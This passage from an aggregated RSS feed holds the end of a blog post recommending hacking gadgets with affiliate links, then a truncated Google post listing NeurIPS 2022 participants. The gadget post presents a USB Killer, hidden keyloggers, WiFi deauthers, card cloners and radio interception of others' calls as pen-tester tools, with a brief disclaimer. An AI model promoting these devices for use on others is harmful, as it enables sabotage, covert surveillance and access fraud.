width="200"></a></div><h1><span><a href="https://amzn.to/3zI36P8" target="_blank">7. WiFi Deauther Watch</a><br></span></h1><p>As the name said it's a deauther, it de-authenticate the WiFi users and they got disconnected. It's not a jammer. It uses ESP8266 WiFi development board to do so. Here it's watch version is looks super cool gadget for every hacker.<br></p><div class="separator"><a href="https://amzn.to/3zI36P8" target="_blank"><img alt="wifi deauther" border="0" data-original-height="1412" data-original-width="1430" height="198" src="https://1.bp.blogspot.com/-z3O7tccMq1E/YNCUkCLeWRI/AAAAAAAAFeU/8B5t0YEna_0OP0VYjG7-YSo5YeESlRk_gCLcBGAsYHQ/w200-h198/deauther.png" title="wifi deauther" width="200"></a></div><p>While a jammer just creates noise on a specific frequency range (i.e. 2.4 GHz), a deauthentication attack is only possible due to a vulnerability in the Wi-Fi (802.11) standard. The deauther does not interfere with any frequencies, it is just sending a few Wi-Fi packets that let certain devices disconnect. That enables us to specifically select every target. A jammer just blocks everything within a radius and is therefore highly illegal to use.</p><p><a href="https://amzn.to/3zI36P8" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a> <br></p><h1><a href="https://amzn.to/3xHfGMM" target="_blank"><span>8. USB Killer</span></a></h1><p>Computers doesn't check the current flowing through USB, because it uses computers own power and can't transmit more voltage. But what if we took an advantage of this to burn our (using on others is totally illegal) entire system.</p><div class="separator"><a href="https://amzn.to/3xHfGMM" target="_blank"><img alt="USB Killer" border="0" data-original-height="250" data-original-width="800" height="125" src="https://1.bp.blogspot.com/-EPZpLxGEB6c/YNCYahrK4eI/AAAAAAAAFec/k77FsoTGOK4zAResNdKZQC6ct5UcTr4owCLcBGAsYHQ/w400-h125/usb-killer-featured.webp" title="USB Killer" width="400"></a></div><p>When plugged into a device, the USB Killer rapidly charges its capacitors from the USB power lines. When the device is charged, -200VDC is discharged over the data lines of the host device. This charge/discharge cycle is repeated many times per second, until the USB Killer is removed. As the result target device becomes burned and unrepairable.</p><p>Its compact size and flash-drive style housing makes it an important device in every pen-tester's toolkit. It can be used multiple times as we want.</p><p><a href="https://amzn.to/3xHfGMM" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a> <br></p><h1><a href="https://amzn.to/3qpaOtb" target="_blank"><span>9. Bad USB</span></a></h1><p>This is a super alternative of <a href="https://amzn.to/3wLRIA8" target="_blank">USB Rubber Ducky</a>. This device contains customized HW based on Atmega32u4 and ESP-12S. This device allows keystrokes to be sent via Wi-Fi to a target machine. The target recognizes the Ducky as both a standard HID keyboard and a serial port, allows interactive commands and scripts to be executed on the target remotely.</p><div class="separator"><a href="https://amzn.to/3qpaOtb" target="_blank"><img alt="bad usb with wifi" border="0" data-original-height="661" data-original-width="763" height="173" src="https://1.bp.blogspot.com/-4sCh14CE5Jo/YNFg0ydcAQI/AAAAAAAAFek/95XLGCcGlvwx89AZU5K91zQaA_hgb73GgCLcBGAsYHQ/w200-h173/badusb.png" title="bad usb with wifi" width="200"></a></div><p>Attacker can easily carry it as a thumb drive and plug into any PC to inject payload, running own command on it, it also can be controlled over WiFi. It looks like innocent USB thumb drive, which is a great advantage. But this is doesn't have faster speed like <a href="https://amzn.to/3wLRIA8" target="_blank">USB Rubber Ducky</a>.</p><p><a href="https://amzn.to/3qpaOtb" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a> <br></p><h1><a href="https://amzn.to/35HWUsJ" target="_blank"><span>10. Hardware Keylogger</span></a></h1><p>A hardware keylogger can be inserted between USB keyboard and computer. It captures all the keystrokes made from the keyboard, must have thing for every cybersecurity expert.</p><div class="separator"><a href="https://amzn.to/35HWUsJ" target="_blank"><img alt="hardware keylogger" border="0" data-original-height="199" data-original-width="261" height="152" src="https://1.bp.blogspot.com/-F3v9-AnEeF8/YNF3H1m8K_I/AAAAAAAAFes/PHqIaWo6hww-mFnVHCkaDJqqvtP6aU-7gCLcBGAsYHQ/w200-h152/keylogger.jpg" title="https://amzn.to/35HWUsJ" width="200"></a></div><p>This is a basic hardware keylogger. It has 16 MB storage. Which is sufficient to capture keystrokes for a year generally. Later we can remove it and plug on our computer to read the keystrokes. Some keyloggers comes with WiFi controlling and SMS controlling functionality. No software can detect it’s there.</p><p><a href="https://amzn.to/35HWUsJ" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a></p><h1><a href="https://amzn.to/3qrubSv" target="_blank"><span>11. Adafruit Bluefruit LE Sniffer</span></a></h1><p>Adafruit  luefruit LE Friend is programmed with a special firmware image  thatturns it into an easy to use Bluetooth Low Energy sniffer. We can  passively capture data exchanges between two Bluetooth Low Energy (BLE)  devices, pushing the data into <a href="https://www.kalilinux.in/2020/03/wireshark-kali-linux-network-protocol-analyzer.html" target="_blank">Wireshark</a>,  the open source network analysis tool, where you can visualize things  on a packet level, with useful descriptors to help us make sense of the  values without having to crack open the 2000 page Bluetooth 4.0 Core  Specification every time.</p><div class="separator"><b><div class="separator"><a href="https://amzn.to/3qrubSv" target="_blank"><img alt="ble sniffer" border="0" data-original-height="506" data-original-width="1188" height="136" src="https://1.bp.blogspot.com/-YA7gzmyR_h0/YNA12lTWjwI/AAAAAAAAFeM/K8xbpeoEMB0oaENU278Fg_rZQzY_xZh_QCLcBGAsYHQ/w320-h136/BLE%2Bsniffer.png" title="ble sniffer" width="320"></a></div>Note:</b> We can only use this device to listen on Bluetooth Low Energy devices!  It will not work on Bluetooth (classic) devices. Firmware V2 is an  improved firmware from Nordic now has better Wireshark-streaming sniffer  software that works with all OS for live-streamed BLE sniffing. The  sniffer firmware cannot be used with the Nordic DFU bootloader firmware,  which means that if we want to reprogram this device you must use a <a href="https://amzn.to/3zHNRFZ" target="_blank">J-Link</a> (and a SWD programmer board). We cannot over-the-air (OTA) reprogram it.</div><div class="separator"><a href="https://amzn.to/3qrubSv" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a></div><h1><a href="https://amzn.to/2Sm2Apc" target="_blank"><span>12. Micro-controllers</span></a></h1><p>There are lots of micro-controllers used by ethical hackers. Some of them are must have in a ethical hackers backpack.</p><h3><a href="https://www.kalilinux.in/2021/06/NodeMCU%20ESP8266" target="_blank"><span><span><a name="more"></a></span>NodeMCU ESP8266</span></a></h3><p></p><div class="separator"><a href="https://amzn.to/3j2JMGE" target="_blank"><img alt="nodemcu esp8266" border="0" data-original-height="738" data-original-width="999" height="148" src="https://1.bp.blogspot.com/-tM1E8gWHu48/YNHmVX9P8_I/AAAAAAAAFfI/Zh_6nq3RClgXKAp5yQcRLxMxzZqe4-BWQCLcBGAsYHQ/w200-h148/nodemcuesp8266.png" title="nodemcu esp8266" width="200"></a></div>ESP8266 is a $6 WiFi development board and it can be used in various way, we can make WiFi deauther by our own. It also can be used to create phishing pages over WiFi.<p></p><p><a href="https://amzn.to/3j2JMGE" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a></p><h3><a href="https://amzn.to/3d4OrnG" target="_blank"><span><span><!--more--></span>Arduino Pro Micro</span></a></h3><p>This tiny micro-controller is one of the best choice for ethical hackers. We can make our own DIY USB Rubber Ducky.</p><div class="separator"><a href="https://amzn.to/3d4OrnG" target="_blank"><img alt="Arduio pro micro" border="0" data-original-height="215" data-original-width="449" height="96" src="https://1.bp.blogspot.com/-OuCxr3oxXIM/YNLbDivENEI/AAAAAAAAFfc/4yHMiGrJvecFaaXm_el37jEL8O8cJgbYACLcBGAsYHQ/w200-h96/pro-micro.png" title="Arduio pro micro" width="200"></a></div><p>Arduino Pro Micro is really good thing at a very low price. But if we want to change the script then we need to reset and upload new script on it from our computer.</p><p><a href="https://amzn.to/3d4OrnG" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a></p><h1><a href="https://amzn.to/3vMj9Ze" target="_blank"><span>13. RTL-SDR</span></a></h1><p>RTL-SDR is a very cheap software defined radio that uses a DVB-T TV tuner dongle based on the RTL2832U chip-set.</p><p></p><div class="separator"><a href="https://amzn.to/3vMj9Ze" target="_blank"><img alt="rtl sdr devices" border="0" data-original-height="519" data-original-width="714" height="146" src="https://1.bp.blogspot.com/-IDDjd5Ae338/YNQYCVkeW1I/AAAAAAAAFgA/9Yass5SHzu8saB_5JqBxi1SAgPQRWxvOgCLcBGAsYHQ/w200-h146/Rtl%2Bsdr.png" title="rtl sdr devices" width="200"></a></div>It can be used to intercept radio frequencies. We can use it for listening others conversations. It is also able to <b>intercept GSM mobile calls and SMS</b>. It is very useful for cybersecurity experts.<br><p></p><p><a href="https://amzn.to/3vMj9Ze" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a></p><h1><a href="https://amzn.to/3gVJW1a" target="_blank"><span>14. Proxmark3 NFC RFID Card Reader</span></a></h1><p>Owning  a Promark3 means owing the most powerful and most complete device  RFID/NFC (LF &amp; HF) testing in the frequencies of 125KHz / 134KHz /  13.56MHz.</p><div class="separator"><a href="https://amzn.to/3gVJW1a" target="_blank"><img alt="promark 3" border="0" data-original-height="732" data-original-width="1364" height="108" src="https://1.bp.blogspot.com/-7-QqPAgCA3k/YNVpzN8ehrI/AAAAAAAAFgQ/G8ySExovMB8Fwonw2xvIWF41VfMPYYxbwCLcBGAsYHQ/w200-h108/promark3.png" title="promark 3" width="200"></a></div>This  devices can make read the data of RFID and NFC cards and then make a  copy of it. We can write the new copies on blank cards provided with  this package. We we need more we can buy more <a href="https://amzn.to/3jcCK1W" target="_blank">blank cards on Amazon</a>.<br><p>Therefore,  investing some more bucks in upgrading it, it's not a bad idea. To  improve its range we need the extended range antennas for LF and HF.</p><p>Another  new and nice upgrade for it, is the Blue Shark Bluetooth 2.0 upgrade,  that permits controlling the proxmark3 wirelessly plus adding an  external battery to create an autonomous proxmark3 that can be connected  and controlled from your computer or smartphone. The Walrus NFC  application has been updated to permit control by Bluetooth. It also  fixes the high temperature concerns adding a metal cooler.</p><div><a href="https://amzn.to/3gVJW1a" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a></div><h1><a href="https://www.kalilinux.in/2020/07/wifi-adapter-kali-linux-2020.html" target="_blank"><span>WiFi Adapters (Monitor Mode &amp; Packet Injection)</span></a><br></h1><div class="separator"><a href="https://1.bp.blogspot.com/-FFcDJKEH-XQ/YNR4d_n8NPI/AAAAAAAAFgI/vpIWMnbsNVI-i26Q9LtxfRTyhyIikv4PQCLcBGAsYHQ/s1431/wifi%2Badapter.jpg"><img alt="wifi adapter for kali linux" border="0" data-original-height="1080" data-original-width="1431" height="151" src="https://1.bp.blogspot.com/-FFcDJKEH-XQ/YNR4d_n8NPI/AAAAAAAAFgI/vpIWMnbsNVI-i26Q9LtxfRTyhyIikv4PQCLcBGAsYHQ/w200-h151/wifi%2Badapter.jpg" title="wifi adapter for kali linux" width="200"></a></div><p>WiFi adapter specially which supports monitor mode and packet injection is essential for WiFi penetration testing. So most of the hackers uses it. We had noticed that Alfa makes awesome adapters for cyber-security personals. We already discussed it on our <a href="https://www.kalilinux.in/2020/07/wifi-adapter-kali-linux-2020.html" target="_blank">Best WiFi adapter for Kali Linux</a> article. Please check out that article before buying an WiFi adapter.</p><div class="separator"><a href="https://amzn.to/3qmqRIh" target="_blank"><img alt="Wifi adapter price on amazon" border="0" data-original-height="120" data-original-width="300" height="80" src="https://1.bp.blogspot.com/-yeuj9QIDmhI/YNQQlMVhGWI/AAAAAAAAFfw/kP0PIcVb0NYv2kn8EG7_p3_crbT8Tz4MgCLcBGAsYHQ/w200-h80/images.png" title="Wifi adapter price on amazon" width="200"></a></div><h1><span>Something Extra</span><br></h1><p>This is the gadgets for hackers we can directly buy from <a href="https://amzn.to/35I3hwb" target="_blank">Amazon</a> and help us on our ethical hacking journey. There are some more gadgets used by hackers but talking about them will be not ethical here. Most of them manufactured from china and available on some online stores. There are some cool stores like <a href="https://hak5.org/" target="_blank">Hak5</a>, but in this article we discussed about some gadgets which are openly available on <a href="https://amzn.to/35I3hwb" target="_blank">Amazon</a>.</p><p><span><b>Warning:-</b> Using the above devices is not illegal. They are selling publicly on <a href="https://amzn.to/35I3hwb" target="_blank">Amazon</a>. But using these devices to harm anyone is totally illegal. We listed them for educational purpose and to safe ourselves from these kind of devices. If anyone uses this devices to harm anyone then we are not responsible for that, Amazon also not responsible. So use this devices responsibly, always remember:</span></p><div class="separator"><a href="https://amzn.to/3gW4Wot" target="_blank"><img alt="Spiderman is also Anonymous" border="0" data-original-height="776" data-original-width="594" height="299" src="https://1.bp.blogspot.com/-9COlgFxrg5s/YM2NMu53ofI/AAAAAAAAFdU/XUhPtj7oEV8GriIyFjTBC73CrPnRyMMJgCPcBGAYYCw/w229-h299/with%2Bgreat.jpg" title="Spiderman is also Anonymous" width="229"></a></div>That's for today. <b>Love our articles?</b> Make sure to <b>follow us</b> on <a class="d-link" href="https://twitter.com/Kali_tutorials" target="_blank">Twitter</a> and <a class="d-link" href="https://github.com/jaykali" target="_blank">GitHub</a>, we post article updates there. To join our <b>KaliLinuxIn</b> family, join our <b><span><a class="d-link" href="https://t.me/kalilinuxin" target="_blank">Telegram Group</a></span></b>. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the <span>comment section</span>. As we know our comment section is always open to everyone. We read each and every comment and <b><span>we always reply</span></b>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google at NeurIPS 2022]]></title>
<description><![CDATA[Posted by Cat Armato, Program Manager, Google  This week marks the beginning of the 36th annual Conference on Neural Information Processing Systems (NeurIPS 2022), the biggest machine learning conference of the year, which is being held in New Orleans, LA. NeurIPS 2022 will be held in person with...]]></description>
<link>https://tsecurity.de/de/1710986/ai-nachrichten/google-at-neurips-2022/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1710986/ai-nachrichten/google-at-neurips-2022/</guid>
<pubDate>Mon, 28 Nov 2022 21:43:16 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="byline-author">Posted by Cat Armato, Program Manager, Google </span> <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFu9A3sY0HxdAipfjxcvc3VgHgId2k0W4LpXS5sDZb9DJ8iVrCngQMygh5DJAvKHTIIWPzuSL1s4_jmQwdPMAEzm_gbRT3Bo_GcLoQxN6vtr14NjTSuqWPwlMELRBXsI86xtJqEaqj_hAOoaFMLMfG0yeB9SzJtBMWoGLFSVQ3yc5zPs-aGHGVVSZnqg/s1040/GoogleNewOrleansNeurIPS2022-lrg.jpg"><p>This week marks the beginning of the 36th annual Conference on Neural Information Processing Systems (<a href="https://nips.cc/Conferences/2022">NeurIPS 2022</a>), the biggest machine learning conference of the year, which is being held in New Orleans, LA. NeurIPS 2022 will be held in person with additional options for virtual attendees, and includes invited talks, demonstrations and presentations of some of the latest in machine learning research. This year, NeurIPS is also offering a new track, called Spotlight Papers, which will provide opportunities to highlight papers presented in prestigious journals that would otherwise not have been eligible for submission. </p> <a name="more"></a>   <p>Google is proud to be a Diamond level sponsor of NeurIPS this year and will have a significant presence year with more than 175 accepted papers, additionally contributing to and learning from the broader academic research community through numerous talks, posters, workshops, and tutorials. You can learn more about our work being presented in the list below (Google affiliations highlighted in <b>bold</b>). </p>  <div>    <br></div><h2>Organizing Committee</h2>  <p>General Chairs includes:<i><b> Sanmi Koyejo</b></i></p> <p>Program Chairs include: <i><b>Alekh Agarwal</b></i></p> <p>Workshop Chairs include:<i><b> Hanie Sedghi</b></i></p> <p>Tutorial Chairs include:<i><b> Adji Bousso Dieng</b></i>, <i><b>Jessica Schrouff</b></i></p> <p>Affinity Workshop Chair:<i><b> Adji Bousso Dieng</b></i>,<i><b> Jessica Schrouff</b></i></p> <p>Program Committee, Senior Area Chairs include:<i><b> Corinna Cortes</b></i>, <i><b>Claudio Gentile</b></i>, <i><b>Mohammad Ghavamzadeh</b></i>, <i><b>Amir Globerson</b></i>, <i><b>Elad Hazan</b></i>, <i><b>Katherine Heller</b></i>, <i><b>Satyen Kale</b></i>, <i><b>Been Kim</b></i>, <i><b>Sanjiv Kumar</b></i>, <i><b>Hugo Larochelle</b></i>, <i><b>Sergey Levine</b></i>, <i><b>Yishay Mansour</b></i>, <i><b>Mehryar Mohri</b></i>, <i><b>Tara Sainath</b></i>, <i><b>Dale Schuurmans</b></i>, <i><b>Daniel Tarlow</b></i></p> <p>NeurIPS Foundation Board Secretary: <i><b>Michael Mozer</b></i></p> <p>NeurIPS Foundation Board Members include: <i><b>Corinna Cortes</b></i>, <i><b>Isabelle Guyon</b></i>, <i><b>Sanmi Koyejo</b></i>,<i><b> </b></i><i><b>Hugo Larochelle</b></i></p> <p>NeurIPS Foundation Advisory Board include: <i><b>Peter Bartlett</b></i>, <i><b>Zoubin Ghahramani</b></i>, <i><b>John C. Platt</b></i>, <i><b>Fernando Pereira</b></i>, <i><b>Dale Schuurmans</b></i></p>  <div>    <br></div><h2>Keynote Speakers</h2>  <p><a href="https://nips.cc/virtual/2022/invited-talk/56158">The Data-Centric Era: How ML is Becoming an Experimental Science</a><br><i><b>Isabelle Guyon</b></i></p> <p><a href="https://nips.cc/virtual/2022/invited-talk/55869">The Forward-Forward Algorithm for Training Deep Neural Networks</a><br><i><b>Geoffrey Hinton</b></i></p>   <div>    <br></div><h2>Outstanding Paper Award</h2>  <p><a href="https://openreview.net/pdf?id=08Yk-n5l2Al">Photorealistic Text-to-Image Diffusion Models with Deep Language Understanding</a><br><i><b>Chitwan Saharia</b></i>,<i><b> William Chan</b></i>, <i><b>Saurabh Saxena</b></i>,<i><b> Lala Li</b></i>,<i><b> Jay Whang</b></i>,<i><b> Emily Denton</b></i>, <i><b>Seyed Kamyar Seyed Ghasemipour</b></i>,<i><b> Burcu Karagol Ayan</b></i>,<i><b> S. Sara Mahdavi</b></i>, <i><b>Rapha Gontijo Lopes</b></i>, <i><b>Tim Salimans</b></i>,<i><b> Jonathan Ho</b></i>,<i><b> David J Fleet</b></i>,<i><b> Mohammad Norouzi</b></i></p>   <div>    <br></div><h2>EXPO Day Workshops</h2>  <p><a href="https://nips.cc/Expo/Conferences/2022/workshop/63090">Graph Neural Networks in Tensorflow: A Practical Guide</a><br>Workshop Organizers include: <i><b>Bryan Perozzi</b></i>,<i><b> Sami Abu-el-Haija</b></i></p> <p><a href="https://nips.cc/Expo/Conferences/2022/workshop/63085">A Hands-On Introduction to Tensorflow and Jax</a><br>Workshop Organizers include: <i><b>Josh Gordon</b></i></p>   <div>    <br></div><h2>Affinity Workshops </h2>  <p><a href="https://www.latinxinai.org/neurips-2022">LatinX in AI (LXAI)</a><br>Platinum Sponsor <br>Networking &amp; Social Chairs include: <i><b>Andres Muñoz Medina</b></i><br>Program Committee includes: <i><b>Johan Obando Ceron</b></i></p> <p><a href="https://www.queerinai.com/neurips-2022">Queer in AI</a><br>Panelists include: <i><b>Sara Beery</b></i>,<i><b> Talia Ringer</b></i></p> <p><a href="https://sites.google.com/corp/view/wiml2022/">Women in Machine Learning (WiML)</a><br>Platinum Sponsor <br>Workshop Organizers and Mentorship Chairs include: <i><b>Beliz Gunel</b></i><br>Mentors include: <i><b>Adam Roberts</b></i>, <i><b>Eleni Triantafillou</b></i>, <i><b>Zelda Mariet</b></i>, <i><b>Clara Hu</b></i>,<i><b> Rosanne Liu</b></i>, <i><b>Alekh Agarwal</b></i>, <i><b>Vinod Prabhakaran</b></i>, <i><b>Rose Yu</b></i>, <i><b>Katherine Heller</b></i></p>       <div>    <br></div><h2>Workshops</h2>  <p><a href="https://nehzux.github.io/NewInML2022NeurIPS/">New in ML</a><br>Workshop Organizers include: <i><b>Isabelle Guyon</b></i></p>  <p><a href="https://sites.google.com/corp/view/ai4mat">AI for Accelerated Materials Design (AI4Mat)</a><br>Workshop Organizers include: <i><b>Benjamin Sanchez-Lengeling</b></i></p> <p><a href="https://attention-learning-workshop.github.io/">All Things Attention: Bridging Different Perspectives on Attention</a><br>Invited Speakers and Panelists include: <i><b>Vidhya Navalpakkam</b></i></p>  <p><a href="https://neurips2022-enlsp.github.io/">Efficient Natural Language and Speech Processing (ENLSP-II): The Future of Pre-trained Models</a><br>Invited Speakers include: <i><b>Tara Sainath</b></i>, <i><b>Anna Huang</b></i><br>Invited Panelists include: <i><b>Mohammad Norouzi</b></i><br>Program Committee includes: <i><b>Wenhu Chen</b></i></p>  <p><a href="https://federated-learning.org/fl-neurips-2022/">Federated Learning: Recent Advances and New Challenges</a><br>Program Committee includes: <i><b>Kallista Bonawitz</b></i>,<i><b> Zachary Charles</b></i>,<i><b> Wenshuo Guo</b></i>, <i><b>Peter Kairouz</b></i>, <i><b>Zhaozhuo Xu</b></i>,<i><b> Zheng Xu</b></i></p>  <p><a href="https://gp-seminar-series.github.io/neurips-2022/">Gaussian Processes, Spatiotemporal Modeling, and Decision-Making Systems</a><br>Workshop Organizers include: <i><b>Zi Wang</b></i><br>Invited Speakers include: <i><b>Jasper Snoek</b></i>,<i><b> Carolina Osorio</b></i><br>Advisory Board includes: <i><b>Zoubin Ghahramani</b></i></p>  <p><a href="https://hity-workshop.github.io/NeurIPS2022/">Has it Trained Yet? A Workshop for Algorithmic Efficiency in Practical Neural Network Training</a><br>Workshop Organizers include: <i><b>Zachary Nado</b></i>, <i><b>George Dahl</b></i>,<i><b> Naman Agarwal</b></i>,<i><b> Aakanksha Chowdhery</b></i><br>Invited Speakers include: <i><b>Aakanksha Chowdhery</b></i>,<i><b> Priya Goyal</b></i></p>  <p><a href="https://neurips-hill.github.io/">Human in the Loop Learning (HiLL)</a><br>Workshop Organizers include: <i><b>Fisher Yu, Vittorio Ferrari</b></i><br>Invited Speakers include: <i><b>Dorsa Singh</b></i>,<i><b> Igor Mordatch</b></i>,<i><b> Ding Zhao</b></i></p>  <p><a href="https://sites.google.com/corp/view/interpolation-workshop">INTERPOLATE — First Workshop on Interpolation Regularizers and Beyond</a><br>Workshop Organizers include: <i><b>Yann Dauphin</b></i><br>Invited Speakers include: <i><b>Chelsea Finn</b></i><br>Panelists include: <i><b>Chelsea Finn</b></i>, <i><b>Dustin Tran</b></i><br>Program Committee includes:<i><b> Wang Chen</b></i>,<i><b> Kimin Lee</b></i></p>  <p><a href="https://larel-workshop.github.io/">LaReL: Language and Reinforcement Learning</a><br>Invited Speakers include: <i><b>Dorsa Singh</b></i>,<i><b> Igor Mordatch</b></i></p>  <p><a href="https://sites.google.com/corp/view/med-neurips-2022">Medical Imaging Meets NeurIPS</a><br>Program Committee includes:<i><b> Chenyu You</b></i></p>  <p><a href="https://memari-workshop.github.io/">Memory in Artificial and Real Intelligence (MemARI)</a><br>Program Committee includes:<i><b> Benjamin Eysenbach</b></i>, <i><b>Otilia Stretcu</b></i></p>  <p><a href="https://meta-learn.github.io/2022/">Meta-Learning</a><br>Workshop Organizers include:<i><b> Eleni Triantafillou</b></i><br>Invited Speakers include: <i><b>Lucas Byer</b></i>, <i><b>Chelsea Finn</b></i><br>Program Committee includes: <i><b>Ishita Dasgupta</b></i>,<i><b> Praneet Dutta</b></i>,<i><b> Benjamin Eysenbach</b></i>,<i><b> Maximilian Igl</b></i>,<i><b> Louis Kirsch</b></i>,<i><b> Parsa Mahmoudieh</b></i>,<i><b> Marc Pickett</b></i>,<i><b> Eleni Triantafillou</b></i></p>  <p><a href="https://glfrontiers.github.io/">New Frontiers in Graph Learning (GLFrontiers)</a><br>Workshop Organizers include: <i><b>Hanjun Dai</b></i></p>  <p><a href="https://offline-rl-neurips.github.io/2022/">Offline Reinforcement Learning Workshop: Offline RL as a "Launchpad"</a><br>Workshop Organizers include:<i><b> Rishabh Agarwal</b></i>,<i><b> Aviral Kumar</b></i>, <i><b>George Tucker</b></i><br>Invited Speakers include: <i><b>Dorsa Sadigh</b></i></p>  <p><a href="https://score-based-methods-workshop.github.io/">Score-Based Methods</a><br>Invited Speakers include: <i><b>Mohammad Norouzi</b></i><br>Invited Panelists include: <i><b>Jascha Sohl-Dickstein</b></i></p>  <p><a href="https://www.syntheticdata4ml.vanderschaar-lab.com/">Synthetic Data for Empowering ML Research</a><br>Invited Speakers include: <i><b>Mehryar Mohri</b></i><br>Invited Panelists include:<i><b> Katrina Ligett</b></i><br>Program Committee includes: <i><b>Jinsung Yoon</b></i></p>  <p><a href="https://table-representation-learning.github.io/">Table Representation Learning</a><br>Workshop Organizers include: <i><b>Pengcheng Yin</b></i><br>Invited Speakers include: <i><b>Xinyun Chen</b></i>, <i><b>Carsten Binnig</b></i><br>Panelists include: <i><b>Julian Eisenschlos</b></i><br>Program Committee includes:<i><b> Wenhu Chen</b></i>,<i><b> Xinyun Chen</b></i>, <i><b>Beliz Gunel</b></i></p>  <p><a href="https://sites.google.com/corp/view/caudyn2022/home">A Causal View on Dynamical Systems</a><br>Program Committee includes: <i><b>Rose Yu</b></i></p>  <p><a href="https://www.afciworkshop.org/">Algorithmic Fairness Through the Lens of Causality and Privacy</a><br>Workshop Organizers include:<i><b> Awa Dieng</b></i><br>Invited Speakers include: <i><b>Nicolas Papernot</b></i><br>Roundtable Leads include: <i><b>David Madras</b></i>,<i><b> Negar Rostamzadeh</b></i>,<i><b> Nyalleng Moroosi</b></i><br>Program Committee includes: <i><b>Matt Kusner</b></i></p>  <p><a href="https://sites.google.com/corp/view/broadening-collaboration-in-ml/">Broadening Research Collaborations in ML</a><br>Workshop Organizers include: <i><b>Rosanne Liu</b></i>, <i><b>Pablo Samuel Castro</b></i>, <i><b>Sunipa Dev</b></i></p>  <p><a href="https://ai-secure.github.io/DMLW2022/">Decentralization and Trustworthy Machine Learning in Web3: Methodologies, Platforms, and Applications</a><br>Invited Speakers include: <i><b>Peter Kairouz</b></i></p>  <p><a href="https://sites.google.com/view/distshift2022">Distribution Shifts (DistShift): Connecting Methods and Applications</a><br>Workshop Organizers include: <i><b>Becca Roelofs</b></i>, <i><b>Chelsea Finn</b></i>, <i><b>Jacob Eisenstein</b></i>, <i><b>Pang Wei Koh</b></i><br>Invited Speakers include:<i><b> Sarah Beery</b></i></p>   <p><a href="https://sites.google.com/corp/view/fmdm-neurips/">Foundation Models for Decision Making</a><br>Workshop Organizers include:<i><b> Sherry Yang</b></i>,<i><b> Yilun Du</b></i>,<i><b> Igor Mordatch</b></i>,<i><b> Shixiang Shane Gu</b></i>,<i><b>Ofir Nachum</b></i><br>Invited Speakers include: <i><b>Dorsa Sadigh</b></i>,<i><b> Dale Schuurmans</b></i>,<i><b> Machel Reid</b></i><br>Program Committee includes: <i><b>Bo Dai</b></i>, <i><b>Aleksandra Faust</b></i>,<i><b> Hiroki Furuta</b></i>, <i><b>Kati Goshvadi</b></i>, <i><b>Izzeddin Gur</b></i>,<i><b> Austin Huang</b></i>,<i><b> Kimin Lee</b></i>,<i><b> Kuang-Huei Lee</b></i>,<i><b> Lisa Lee</b></i>,<i><b> Yingjie Miao</b></i>,<i><b> Jordi Orbay</b></i>,<i><b> Ted Xiao</b></i></p>  <p><a href="https://gaze-meets-ml.github.io/gaze_ml_2022/">Gaze Meets ML</a><br>Program Committee includes: <i><b>Peter Mattson</b></i>,<i><b> Mehdi Moradi</b></i></p>  <p><a href="https://sites.google.com/corp/view/icbinb-2022/">I Can’t Believe It’s Not Better: Understanding Deep Learning Through Empirical Falsification</a><br>Workshop Organizers include: <i><b>Javier Antorán</b></i><br>Panelists include: <i><b>Kevin Murphy</b></i></p>   <p><a href="https://internlp.github.io/">Interactive Learning for Natural Language Processing</a><br>Invited Speakers include: <i><b>Anca 